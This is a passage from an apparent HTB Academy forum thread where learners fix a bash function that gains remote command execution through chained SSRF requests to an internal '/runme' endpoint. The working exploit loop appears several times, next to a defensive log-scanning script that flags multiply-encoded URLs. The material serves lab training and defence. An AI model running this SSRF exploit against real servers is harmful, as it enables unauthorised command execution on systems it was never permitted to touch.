SSRF Exploitation Example - Bash Function

In the SSRF exploitation example section, at the end of the section, HTB Academy gives you a bash function to use in order to gain RCE via SSRF. The issue I'm having is that when I try to use the function, I get nothing but syntax errors, and I do not know enough to sort out why. When I looked up function writing via the bash terminal, nothing stood out. So I'm asking you pros for help.

┌──(root㉿kali)-[~]
└─# function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'

And when I try to write it out without creating new lines, I still get syntax errors.

┌──(root㉿kali)-[~]
└─# function rce() { function> while true; do function while> echo -n "# "; read cmd function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri) function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}" function while> echo "" function while> done function> }
bash: syntax error near unexpected token `>'

Any help would be great, thanks!

Hey, I have fielded a few questions about this bash function, so I will leave this here. I would recommend just throwing it into a script instead:

#!/bin/bash

function rce() {
    while true; do
        echo -n "# "; read cmd
        ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
        curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
        echo ""
    done
}
rce

I have always found that I make mistakes while trying to type it into the CLI like the example shows. Hope this helps.
-onthesauce

2 Likes
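The function above runs the command through `jq -sRr @uri` three times because the URL chains three hops and each hop decodes one layer, so the front-end access log still holds a multiply-encoded value. The sketch below is an added example, not code from this thread or from HTB Academy, showing how a defender can flag that pattern; the function names, the log lines and the depth threshold of 2 are assumptions.

```shell
# Added example (defender side): flag logged requests whose target is
# percent-encoded more than once. Log lines below are constructed samples.

# Decode exactly one layer of percent-encoding (ASCII range, POSIX awk).
urldecode_once() {
    printf '%s\n' "$1" | awk '
    BEGIN { for (i = 1; i < 128; i++) chr[sprintf("%02X", i)] = sprintf("%c", i) }
    {
        out = ""
        while (match($0, /%[0-7][0-9A-Fa-f]/)) {
            hex = toupper(substr($0, RSTART + 1, 2))
            out = out substr($0, 1, RSTART - 1) chr[hex]
            $0 = substr($0, RSTART + 3)
        }
        print out $0
    }'
}

# Number of decode passes until the value stops changing (capped at 8).
encoding_depth() {
    ed_cur=$1; ed_depth=0
    while [ "$ed_depth" -lt 8 ]; do
        ed_next=$(urldecode_once "$ed_cur")
        if [ "$ed_next" = "$ed_cur" ]; then break; fi
        ed_cur=$ed_next; ed_depth=$((ed_depth + 1))
    done
    echo "$ed_depth"
}

# Read access-log lines on stdin; print "<depth> <target>" for every request
# target needing at least $1 decode passes (assumed threshold, default 2).
flag_multi_encoded() {
    fm_min=${1:-2}
    while IFS= read -r fm_line; do
        fm_target=$(printf '%s\n' "$fm_line" | awk -F'"' '{ split($2, r, " "); print r[2] }')
        fm_depth=$(encoding_depth "$fm_target")
        if [ "$fm_depth" -ge "$fm_min" ]; then echo "$fm_depth $fm_target"; fi
    done
}

sample_log() {  # constructed log lines, documentation-range client IPs
    cat <<'EOF'
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html?page=2 HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=hello%20world HTTP/1.1" 200 734
192.0.2.77 - - [01/Jan/2024:10:00:03 +0000] "GET /load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=echo%252520test HTTP/1.1" 200 48
EOF
}

sample_log | flag_multi_encoded
```

Only the third sample line is reported, with depth 3; the singly encoded search request stays below the threshold.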

Thanks man, I actually thought about putting it into a script but I wasn’t sure if it could be used the same way or if I would have to do something different to get it working. Although I’ve been using Linux for a long time, I’ve only written basic scripts that are pretty much just a bunch of single-line commands put into a text file. So functions in bash are new to me and are something I’m going to have to work on. Thanks again bro! Happy new year!

Another way I thought about after creating this post, and actually just tried out, is using ChatGPT. And no surprise, it works flawlessly. It’s also the same as what’s in your script.
So for anyone who doesn’t want to create a bash script, just use this or ChatGPT to fix the example.


function rce() {
    while true; do
        echo -n "# "; read cmd
        ecmd=$(echo -n "$cmd" | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
        curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http:////127.0.0.1:5000/runme?x=${ecmd}"
        echo ""
    done
}

1 Like

You have come in so clutch during these modules.
Going to have to buy you a beer.

I am trying to pay it forward myself being involved here, being a new user, but these forums and namely your specific, guided, and informational (educational) might actually save my life in the future. Thank you.

1 Like

Hey I really appreciate the kind words. I am glad that I have been able to make a positive impact on your journey through the modules. Paying it forward is really the key to the forums.

You are very welcome!
-onthesauce

1 Like